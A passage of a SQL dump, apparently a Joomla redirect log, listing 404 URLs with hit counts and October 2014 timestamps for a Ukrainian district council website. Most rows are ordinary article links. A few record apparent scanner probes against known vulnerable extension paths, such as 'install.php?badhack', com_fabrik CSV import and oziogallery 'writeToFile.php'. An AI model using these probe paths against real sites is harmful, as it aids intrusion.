00:00:00',301),(8498,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=984:-20-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-15 17:13:44','0000-00-00 00:00:00',301),(8499,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1133:2013-11-14-07-12-22&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-15 17:13:54','0000-00-00 00:00:00',301),(8500,'http://www.malyn-rayrada.org.ua/index.php?id=4&Itemid=8&lang=uk&layout=blog&option=com_content&view=category','','','',3,0,'2014-10-15 17:39:40','0000-00-00 00:00:00',301),(8501,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-10-15 17:41:00','0000-00-00 00:00:00',301),(8502,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1040:2013-07-01-14-27-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-10-15 17:57:41','0000-00-00 00:00:00',301),(8503,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=501:2011-12-14-13-07-32&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-15 18:13:54','0000-00-00 00:00:00',301),(8504,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1360:-qq&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-15 18:48:03','0000-00-00 00:00:00',301),(8505,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1285:2014-04-17-16-55-05&lang=uk&option=com_content&view=article','','','',4,0,'2014-10-15 19:06:59','0000-00-00 00:00:00',301),(8506,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=956:2013-03-07-14-51-33&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-15 19:07:01','0000-00-00 00:00:00',301),(8507,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1050:2013-07-15-13-52-21&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-15 19:07:07','0000-00-00 00:00:00',301),(8508,'http://malyn-rayrada.org.ua/index.php?Itemid=10&id=1&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2014-10-15 19:47:24','0000-00-00 00:00:00',301),(8509,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=893:-2013-2014-&catid=47:-21022013-&Itemid=86&lang=ru','','','',2,0,'2014-10-15 19:55:03','0000-00-00 00:00:00',301),(8510,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1062:2013-07-29-13-33-29&lang=en&option=com_content&view=article','','','',1,0,'2014-10-15 20:22:44','0000-00-00 00:00:00',301),(8511,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1262:2014-03-31-11-36-45&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-15 20:41:22','0000-00-00 00:00:00',301),(8512,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1030:2013-06-17-06-46-59&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-15 21:56:16','0000-00-00 00:00:00',301),(8513,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1354:-lr-&lang=en&option=com_content&view=article','','','',1,0,'2014-10-15 21:56:18','0000-00-00 00:00:00',301),(8514,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1032:-l-r-2012-2015-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-15 23:50:38','0000-00-00 00:00:00',301),(8515,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11&Itemid=14&lang=en','','','',6,0,'2014-10-16 00:10:02','0000-00-00 00:00:00',301),(8516,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1161:2013-12-18-13-34-32&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-16 00:32:29','0000-00-00 00:00:00',301),(8517,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1226:-1996-2004-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-16 00:32:34','0000-00-00 00:00:00',301),(8518,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1258:2014-03-31-06-18-35&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-16 01:04:17','0000-00-00 00:00:00',301),(8519,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1174:-2013-&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-16 01:25:28','0000-00-00 00:00:00',301),(8520,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1254:-1-50&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-16 01:25:34','0000-00-00 00:00:00',301),(8521,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1008:2013-05-20-07-02-57&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-16 01:25:35','0000-00-00 00:00:00',301),(8522,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1042:-qq-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-16 02:06:56','0000-00-00 00:00:00',301),(8523,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=968:-2012-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-16 02:38:26','0000-00-00 00:00:00',301),(8524,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1333:2014-06-05-13-09-03&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-16 02:38:29','0000-00-00 00:00:00',301),(8525,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=945:2013-03-04-07-28-58&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-16 02:58:57','0000-00-00 00:00:00',301),(8526,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1220:2014-02-21-15-56-19&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-16 02:59:05','0000-00-00 00:00:00',301),(8527,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1208:2014-01-31-13-48-49&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-16 03:42:31','0000-00-00 00:00:00',301),(8528,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1014:2013-06-03-06-43-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-10-16 03:57:43','0000-00-00 00:00:00',301),(8529,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1207:-----------------2007-2015-&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-16 04:32:38','0000-00-00 00:00:00',301),(8530,'http://www.malyn-rayrada.org.ua/images/stories/install.php?badhack','','','',1,0,'2014-10-16 05:35:20','0000-00-00 00:00:00',301),(8531,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1016:2013-06-03-11-41-36&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-16 05:45:57','0000-00-00 00:00:00',301),(8532,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=963:2013-03-13-06-16-53&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-16 05:46:12','0000-00-00 00:00:00',301),(8533,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=998:1&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-16 06:52:53','0000-00-00 00:00:00',301),(8534,'http://www.malyn-rayrada.org.ua/index.php?Itemid=105&catid=58:--30042014-&id=1304:2014-04-30-09-11-23&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-16 07:19:36','0000-00-00 00:00:00',301),(8535,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-16 07:45:39','0000-00-00 00:00:00',301),(8536,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-16 07:45:46','0000-00-00 00:00:00',301),(8537,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11&lang=ru&Itemid=','','','',3,0,'2014-10-16 07:46:32','0000-00-00 00:00:00',301),(8538,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11&lang=en&Itemid=','','','',3,0,'2014-10-16 07:46:39','0000-00-00 00:00:00',301),(8539,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11&lang=en&Itemid=','','','',1,0,'2014-10-16 07:46:47','0000-00-00 00:00:00',301),(8540,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-16 07:47:08','0000-00-00 00:00:00',301),(8541,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1317:2014-05-25-18-25-09&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-16 07:47:14','0000-00-00 00:00:00',301),(8542,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-16 07:48:51','0000-00-00 00:00:00',301),(8543,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&lang=ru&Itemid=','','','',3,0,'2014-10-16 07:48:54','0000-00-00 00:00:00',301),(8544,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11&lang=uk&Itemid=','','','',3,0,'2014-10-16 07:48:57','0000-00-00 00:00:00',301),(8545,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-16 07:48:59','0000-00-00 00:00:00',301),(8546,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-16 07:49:02','0000-00-00 00:00:00',301),(8547,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-16 07:49:06','0000-00-00 00:00:00',301),(8548,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-16 07:49:09','0000-00-00 00:00:00',301),(8549,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1334:2014-06-06-05-54-20&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-16 07:49:12','0000-00-00 00:00:00',301),(8550,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&lang=ru&Itemid=','','','',7,0,'2014-10-16 07:49:14','0000-00-00 00:00:00',301),(8551,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-16 07:49:17','0000-00-00 00:00:00',301),(8552,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&lang=ru&Itemid=','','','',3,0,'2014-10-16 07:49:23','0000-00-00 00:00:00',301),(8553,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-16 07:49:26','0000-00-00 00:00:00',301),(8554,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1362:-2015-&catid=60&Itemid=108&lang=en','','','',1,0,'2014-10-16 07:49:40','0000-00-00 00:00:00',301),(8555,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1362:-2015-&catid=60&Itemid=108&lang=ru','','','',1,0,'2014-10-16 07:49:42','0000-00-00 00:00:00',301),(8556,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1364:-2012-2015-&catid=60&Itemid=108&lang=ru','','','',1,0,'2014-10-16 07:49:49','0000-00-00 00:00:00',301),(8557,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11&lang=en&Itemid=','','','',1,0,'2014-10-16 07:49:52','0000-00-00 00:00:00',301),(8558,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1366:-2014-&catid=60&Itemid=108&lang=en','','','',1,0,'2014-10-16 07:49:55','0000-00-00 00:00:00',301),(8559,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1366:-2014-&catid=60&Itemid=108&lang=ru','','','',2,0,'2014-10-16 07:49:57','0000-00-00 00:00:00',301),(8560,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11&lang=en&Itemid=','','','',1,0,'2014-10-16 07:50:01','0000-00-00 00:00:00',301),(8561,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&lang=en&Itemid=','','','',1,0,'2014-10-16 08:38:42','0000-00-00 00:00:00',301),(8562,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1347:2014-06-19-11-19-16&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-16 08:38:44','0000-00-00 00:00:00',301),(8563,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11&lang=en&Itemid=','','','',4,0,'2014-10-16 08:39:11','0000-00-00 00:00:00',301),(8564,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11&lang=ru&Itemid=','','','',13,0,'2014-10-16 08:39:13','0000-00-00 00:00:00',301),(8565,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1355:2014-07-02-06-11-04&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-16 08:39:15','0000-00-00 00:00:00',301),(8566,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1356:2014-07-03-06-32-02&catid=11&lang=en&Itemid=','','','',4,0,'2014-10-16 08:39:18','0000-00-00 00:00:00',301),(8567,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11&lang=en&Itemid=','','','',2,0,'2014-10-16 08:39:25','0000-00-00 00:00:00',301),(8568,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-16 08:39:27','0000-00-00 00:00:00',301),(8569,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1357:22-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-16 08:39:32','0000-00-00 00:00:00',301),(8570,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11&lang=en&Itemid=','','','',4,0,'2014-10-16 08:39:34','0000-00-00 00:00:00',301),(8571,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-16 08:39:36','0000-00-00 00:00:00',301),(8572,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11&lang=uk&Itemid=','','','',5,0,'2014-10-16 08:39:39','0000-00-00 00:00:00',301),(8573,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-16 08:39:43','0000-00-00 00:00:00',301),(8574,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-16 08:39:45','0000-00-00 00:00:00',301),(8575,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-16 08:39:48','0000-00-00 00:00:00',301),(8576,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1365:2014-07-10-13-58-58&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-16 08:39:51','0000-00-00 00:00:00',301),(8577,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-16 08:39:53','0000-00-00 00:00:00',301),(8578,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-16 08:39:55','0000-00-00 00:00:00',301),(8579,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11&lang=en&Itemid=','','','',1,0,'2014-10-16 08:39:58','0000-00-00 00:00:00',301),(8580,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-16 08:40:02','0000-00-00 00:00:00',301),(8581,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1370:31-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-16 08:40:05','0000-00-00 00:00:00',301),(8582,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=991:2013-04-22-08-24-54&lang=uk&option=com_content&view=article','','','',5,0,'2014-10-16 08:53:54','0000-00-00 00:00:00',301),(8583,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1089:--------l---r---&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-16 08:53:56','0000-00-00 00:00:00',301),(8584,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1220:2014-02-21-15-56-19&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-16 08:53:57','0000-00-00 00:00:00',301),(8585,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1156:2013-12-09-07-12-03&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-16 09:15:04','0000-00-00 00:00:00',301),(8586,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11&lang=en&Itemid=','','','',4,0,'2014-10-16 09:43:15','0000-00-00 00:00:00',301),(8587,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11&lang=en&Itemid=','','','',1,0,'2014-10-16 09:43:19','0000-00-00 00:00:00',301),(8588,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1146:2013-11-27-10-09-00&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-16 10:27:47','0000-00-00 00:00:00',301),(8589,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1362:-2015-&catid=60&Itemid=108&lang=uk','','','',1,0,'2014-10-16 10:33:36','0000-00-00 00:00:00',301),(8590,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1223:--28-----6-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-16 10:34:02','0000-00-00 00:00:00',301),(8591,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1222:2014-02-22-10-52-44&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2014-10-16 10:35:15','0000-00-00 00:00:00',301),(8592,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1236:2014-03-07-06-36-44&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2014-10-16 10:40:06','0000-00-00 00:00:00',301),(8593,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1252:2014-03-24-17-19-07&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2014-10-16 10:41:03','0000-00-00 00:00:00',301),(8594,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1164:2013-12-29-11-46-36&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2014-10-16 11:21:21','0000-00-00 00:00:00',301),(8595,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=964:-2013-2017-&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-16 12:22:34','0000-00-00 00:00:00',301),(8596,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1236:2014-03-07-06-36-44&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-16 13:35:46','0000-00-00 00:00:00',301),(8597,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=918:----------2013-2015-&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-16 13:35:49','0000-00-00 00:00:00',301),(8598,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-16 13:45:27','0000-00-00 00:00:00',301),(8599,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1023:-l-28r-&Itemid=92&lang=en&option=com_content&view=article','','','',1,0,'2014-10-16 13:48:24','0000-00-00 00:00:00',301),(8600,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1186:-2013-i-2014-&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-16 13:56:07','0000-00-00 00:00:00',301),(8601,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1154:7-&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2014-10-16 14:01:25','0000-00-00 00:00:00',301),(8602,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1215:-1200-&Itemid=14&lang=en&option=com_content&view=article','','','',4,0,'2014-10-16 14:47:50','0000-00-00 00:00:00',301),(8603,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1137:2013-11-15-13-07-04&Itemid=14&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-16 14:54:52','0000-00-00 00:00:00',301),(8604,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1003:1&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2014-10-16 14:56:05','0000-00-00 00:00:00',301),(8605,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1322:------------2012-2015-&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-16 14:57:32','0000-00-00 00:00:00',301),(8606,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1072:-24-6-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-16 14:59:25','0000-00-00 00:00:00',301),(8607,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=943:-qq&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-16 15:12:25','0000-00-00 00:00:00',301),(8608,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1315:-31-6-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-16 15:17:15','0000-00-00 00:00:00',301),(8609,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1372:2014-08-04-19-26-16&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-16 15:24:21','0000-00-00 00:00:00',301),(8610,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1128:2013-11-06-13-04-56&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-16 15:25:52','0000-00-00 00:00:00',301),(8611,'http://www.malyn-rayrada.org.ua/index.php?catid=57:--15042014-&id=1276:2014-04-10-13-26-15&Itemid=98&lang=en&option=com_content&view=article','','','',1,0,'2014-10-16 15:26:13','0000-00-00 00:00:00',301),(8612,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1016:2013-06-03-11-41-36&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-16 15:29:45','0000-00-00 00:00:00',301),(8613,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1001:2013-04-30-12-14-17&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-16 15:29:47','0000-00-00 00:00:00',301),(8614,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=922:2013-02-11-10-53-17&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-16 15:29:49','0000-00-00 00:00:00',301),(8615,'http://www.malyn-rayrada.org.ua/index.php?catid=10:2010-06-05-13-46-44&id=1272:2014-04-09-05-15-36&Itemid=17&lang=en&option=com_content&view=article','','','',1,0,'2014-10-16 15:44:15','0000-00-00 00:00:00',301),(8616,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1205:2014-01-31-07-53-03&Itemid=97&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-16 15:54:32','0000-00-00 00:00:00',301),(8617,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1248:2014-03-21-18-16-44&Itemid=14&lang=en&option=com_content&view=article','','','',1,0,'2014-10-16 16:22:55','0000-00-00 00:00:00',301),(8618,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1095:2013-09-24-13-25-55&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-16 16:36:47','0000-00-00 00:00:00',301),(8619,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1301:-28-&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-16 16:45:13','0000-00-00 00:00:00',301),(8620,'http://malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1371:2014-08-04-19-11-42&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-16 17:03:28','0000-00-00 00:00:00',301),(8621,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1128:2013-11-06-13-04-56&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-16 17:03:35','0000-00-00 00:00:00',301),(8622,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1190:------------2014--&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-16 17:05:11','0000-00-00 00:00:00',301),(8623,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=999:2013-04-28-05-21-05&Itemid=14&lang=uk&option=com_content&view=article','','','',6,0,'2014-10-16 17:40:56','0000-00-00 00:00:00',301),(8624,'http://www.malyn-rayrada.org.ua/index.php?catid=10:2010-06-05-13-46-44&id=1288:2014-04-23-06-50-40&Itemid=17&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-16 17:57:04','0000-00-00 00:00:00',301),(8625,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1092:2013-09-19-12-18-37&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-16 17:59:21','0000-00-00 00:00:00',301),(8626,'http://www.malyn-rayrada.org.ua/index.php?catid=57:--15042014-&id=1274:-l-r&Itemid=98&lang=en&option=com_content&view=article','','','',2,0,'2014-10-16 18:26:50','0000-00-00 00:00:00',301),(8627,'http://malyn-rayrada.org.ua/katalog/components/com_community/index.html','','','',3,0,'2014-10-16 18:31:47','0000-00-00 00:00:00',301),(8628,'http://malyn-rayrada.org.ua/katalog/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',3,0,'2014-10-16 18:31:52','0000-00-00 00:00:00',301),(8629,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1308:2014-05-05-05-20-51&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-16 18:37:00','0000-00-00 00:00:00',301),(8630,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=995:-2012-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-16 18:37:02','0000-00-00 00:00:00',301),(8631,'http://www.malyn-rayrada.org.ua/index.php?Itemid=105&catid=58:--30042014-&id=1299:-lr-&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-16 18:37:04','0000-00-00 00:00:00',301),(8632,'http://www.malyn-rayrada.org.ua/MAQ/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',9,0,'2014-10-16 18:57:36','0000-00-00 00:00:00',301),(8633,'http://www.malyn-rayrada.org.ua/MAQ/components/com_community/index.html','','','',9,0,'2014-10-16 18:57:26','0000-00-00 00:00:00',301),(8634,'http://www.malyn-rayrada.org.ua/cms/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-16 19:02:50','0000-00-00 00:00:00',301),(8635,'http://www.malyn-rayrada.org.ua/cms/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-16 19:03:00','0000-00-00 00:00:00',301),(8636,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=946:-l-r-2011-2015-&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-16 19:52:58','0000-00-00 